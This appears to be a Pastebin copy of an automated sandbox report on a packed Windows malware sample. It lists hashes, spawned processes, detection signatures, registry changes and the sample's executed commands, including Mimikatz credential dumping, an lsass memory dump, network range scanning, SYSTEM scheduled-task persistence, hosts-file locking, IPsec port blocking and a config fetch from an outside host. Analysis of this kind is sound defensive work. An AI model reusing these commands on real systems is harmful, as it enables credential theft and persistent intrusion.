Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_e77b8548080e4a20eb74f40003cb9b42.exe"
- [*] File Size: 5427200
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- [*] SHA256: "0105905704b61fcdebe72c1f344237df510451e1bad08986c8629d9857084e0c"
- [*] MD5: "e77b8548080e4a20eb74f40003cb9b42"
- [*] SHA1: "fdefa723f8f48227b28fd750dece152a3fb8d8c2"
- [*] SHA512: "551b574502257f3a95f8d6b1ceb798ef69f793bcf5e8eb5425644c3b6e8a98ee84cbad856c57a4faa6fdb954e34db1093b5e05f186d0d0d102da23f166a59201"
- [*] CRC32: "0F1DD1BB"
- [*] SSDEEP: "98304:gKq+Q2ru+FBpaizgQA0JzpxsMnuviWyUGGKo8YXBfZcH8AKqkWC6ssZWjACGDZH/:S1g59A0JznXoiYG8M+oFZ0ACFA1o"
- [*] Process Execution: [
- "Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
- "cmd.exe",
- "PING.EXE",
- "ghllihr.exe",
- "services.exe",
- "ghllihr.exe",
- "cmd.exe",
- "cmd.exe",
- "cacls.exe",
- "cmd.exe",
- "cacls.exe",
- "cmd.exe",
- "cacls.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "cmd.exe",
- "wpcap.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "pygejcepu.exe",
- "cmd.exe",
- "vfshost.exe",
- "cmd.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "cmd.exe",
- "schtasks.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "urpjswrnu.exe",
- "netsh.exe",
- "netsh.exe",
- "svchost.exe",
- "svchost.exe",
- "svchost.exe",
- "muemii.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details": [
- {
- "IP": "192.35.177.64:80"
- },
- {
- "IP": "2.21.71.25:80"
- }
- ]
- },
- {
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details": [
- {
- "process": "cmd.exe, PID 2444"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Loads a driver",
- "Details": [
- {
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\npf"
- }
- ]
- },
- {
- "Description": "Expresses interest in specific running processes",
- "Details": [
- {
- "process": "lsass.exe"
- },
- {
- "process": "services.exe"
- },
- {
- "process": "csrss.exe"
- },
- {
- "process": "svchost.exe"
- },
- {
- "process": "[System Process]"
- },
- {
- "process": "spoolsv.exe"
- },
- {
- "process": "wininit.exe"
- },
- {
- "process": "pygejcepu.exe"
- },
- {
- "process": "winlogon.exe"
- },
- {
- "process": "lsm.exe"
- }
- ]
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x00000200"
- },
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x0000c000"
- },
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000200, length: 0x00069f39"
- },
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x0000c01c, length: 0x0005e121"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://uio.hognoob.se:63145/cfg.ini"
- },
- {
- "url": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D"
- },
- {
- "url": "http://crl.identrust.com/DSTROOTCAX3CRL.crl"
- }
- ]
- },
- {
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details": [
- {
- "section": "name: UPX1, entropy: 7.82, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0052c800, virtual_size: 0x0052d000"
- }
- ]
- },
- {
- "Description": "The executable is compressed using UPX",
- "Details": [
- {
- "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00170000"
- }
- ]
- },
- {
- "Description": "Deletes its original binary from disk",
- "Details": []
- },
- {
- "Description": "Forces a created process to be the child of an unrelated process",
- "Details": []
- },
- {
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details": [
- {
- "Process": "netsh.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "ghllihr.exe tried to sleep 7129 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 5180833 times"
- }
- ]
- },
- {
- "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
- "Details": [
- {
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- }
- ]
- },
- {
- "Description": "Mimics the file times of a Windows system file",
- "Details": [
- {
- "mimic_dest": "C:\\Program Files\\WinPcap\\LICENSE",
- "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
- },
- {
- "mimic_dest": "C:\\Program Files\\WinPcap\\rpcapd.exe",
- "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "service name": "tqbseelza"
- },
- {
- "service path": "C:\\Windows\\crznklud\\ghllihr.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath"
- },
- {
- "data": "system32\\drivers\\npf.sys"
- },
- {
- "task": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\""
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Windows\\crznklud\\svschost.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\spoolsrv.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\vimpcsvc.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\docmicfg.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\schoedcl.xml"
- }
- ]
- },
- {
- "Description": "The sample wrote data to the system hosts file.",
- "Details": []
- },
- {
- "Description": "Collects information to fingerprint the system",
- "Details": []
- },
- {
- "Description": "Installs WinPCAP",
- "Details": [
- {
- "file": "C:\\Windows\\System32\\Packet.dll"
- }
- ]
- }
- ]
- [*] Started Service: [
- "tqbseelza",
- "WerSvc",
- "PolicyAgent",
- "npf"
- ]
- [*] Executed Commands: [
- "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crznklud\\ghllihr.exe",
- "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5",
- "C:\\Windows\\crznklud\\ghllihr.exe",
- "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
- "netsh ipsec static del all",
- "netsh ipsec static add policy name=Bastards description=FuckingBastards",
- "netsh ipsec static add filteraction name=BastardsList action=block",
- "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
- "cmd /c net start npf",
- "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "cmd /c C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
- "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
- "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
- "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\"",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP",
- "netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList",
- "netsh ipsec static set policy name=Bastards assign=y",
- "C:\\Windows\\TEMP\\zjbrqggku\\urpjswrnu.exe -accepteula -mp 1128 C:\\Windows\\TEMP\\zjbrqggku\\1128.dmp",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP",
- "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\"",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
- "net stop \"Boundary Meter\"",
- "net stop \"TrueSight Meter\"",
- "net stop npf",
- "net start npf",
- "C:\\Windows\\system32\\net1 stop \"Boundary Meter\"",
- "C:\\Windows\\system32\\net1 stop \"TrueSight Meter\"",
- "C:\\Windows\\system32\\net1 stop npf",
- "C:\\Windows\\system32\\net1 start npf",
- "net start npf",
- "C:\\Windows\\system32\\net1 start npf",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit",
- "schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
- "schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
- "schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\""
- ]
- [*] Mutexes: [
- "IESQMMUTEX_0_208"
- ]
- [*] Modified Files: [
- "C:\\Windows\\crznklud\\ghllihr.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\TemporaryFile",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
- "C:\\Windows\\System32\\drivers\\etc\\hosts",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Packet.dll",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.dll",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\lblgpauls.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\cnli-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\coli-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\crli-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\exma-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libeay32.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libxml2.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\posh-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ssleay32.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tibe-2.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trch-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trfo-2.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tucl-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ucl.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\xdvl-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\zlib1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\svschost.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\spoolsrv.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\vimpcsvc.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\docmicfg.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\schoedcl.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.xml",
- "C:\\Windows\\crznklud\\svschost.xml",
- "C:\\Windows\\crznklud\\spoolsrv.xml",
- "C:\\Windows\\crznklud\\vimpcsvc.xml",
- "C:\\Windows\\crznklud\\docmicfg.xml",
- "C:\\Windows\\crznklud\\schoedcl.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\Shellcode.ini",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture64.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture32.dll",
- "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe",
- "C:\\Windows\\zjbrqggku\\Corporate\\mimidrv.sys",
- "C:\\Windows\\zjbrqggku\\Corporate\\mimilib.dll",
- "C:\\Windows\\zjbrqggku\\upbdrjv\\swrpwe.exe",
- "C:\\Windows\\IME\\ghllihr.exe",
- "C:\\Windows\\Temp\\zjbrqggku\\urpjswrnu.exe",
- "C:\\Windows\\Temp\\nbkteejuk\\muemii.exe",
- "C:\\Windows\\Temp\\nbkteejuk\\config.json",
- "C:\\Windows\\Temp\\20882968\\....\\TemporaryFile",
- "C:\\Windows\\Temp\\20882968\\TemporaryFile",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\644B8874112055B5E195ECB0E8F243A4",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\644B8874112055B5E195ECB0E8F243A4",
- "\\Device\\NamedPipe",
- "\\Device\\Http\\Communication",
- "C:\\Windows\\Temp\\nsm5019.tmp",
- "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
- "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
- "C:\\Windows\\System32\\pthreadVC.dll",
- "C:\\Windows\\System32\\wpcap.dll",
- "C:\\Windows\\System32\\Packet.dll",
- "C:\\Program Files\\WinPcap\\rpcapd.exe",
- "C:\\Program Files\\WinPcap\\LICENSE",
- "C:\\Program Files\\WinPcap\\uninstall.exe",
- "C:\\Windows\\sysnative\\drivers\\npf.sys",
- "C:\\Windows\\sysnative\\wpcap.dll",
- "C:\\Windows\\sysnative\\Packet.dll",
- "\\??\\Global\\NPF_{CFCD29B3-A836-426F-8329-8362EC941293}",
- "\\??\\Global\\NPF_{D720734D-0C14-4C25-829D-F6B4814978B3}",
- "\\??\\Global\\NPF_{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}",
- "\\??\\Global\\NPF_{B22E8C55-CC74-4FBE-B907-F46D25953BEC}",
- "\\??\\Global\\NPF_{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}",
- "\\??\\Global\\NPF_NdisWanIpv6",
- "\\??\\Global\\NPF_NdisWanBh",
- "\\??\\Global\\NPF_{8C8DAC1D-0390-4B59-BF93-EC6C9E68D36A}",
- "\\??\\Global\\NPF_NdisWanIp",
- "\\??\\Global\\NPF_{BFA735C0-8C32-4848-B88D-FA17C2729720}",
- "\\??\\Global\\NPF_{50CD5E3E-0F08-4519-A9EF-B9802ED12701}",
- "\\??\\Global\\NPF_{D25DE530-2291-4668-A771-4DAC18E7B55D}",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
- "C:\\Windows\\sysnative\\Tasks\\trztipllt",
- "C:\\Windows\\Temp\\zjbrqggku\\1128.dmp",
- "\\??\\Global\\ProcmonDebugLogger"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile\\TemporaryFile",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\ip.txt",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Result.txt",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "C:\\Windows\\Temp\\nbkteejuk\\config.json",
- "C:\\Windows\\Temp\\20882968\\....\\",
- "C:\\Windows\\Temp\\20882968\\TemporaryFile\\TemporaryFile",
- "C:\\Windows\\Temp\\20882968\\TemporaryFile",
- "C:\\Windows\\Temp\\20882968",
- "C:\\Windows\\Temp\\nsg4FF8.tmp",
- "C:\\Windows\\Temp\\nsm501A.tmp",
- "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
- "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
- "C:\\Windows\\Temp\\nsm501A.tmp\\",
- "C:\\Windows\\Tasks\\trztipllt.job"
- ]
- [*] Modified Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\WOW64",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecData",
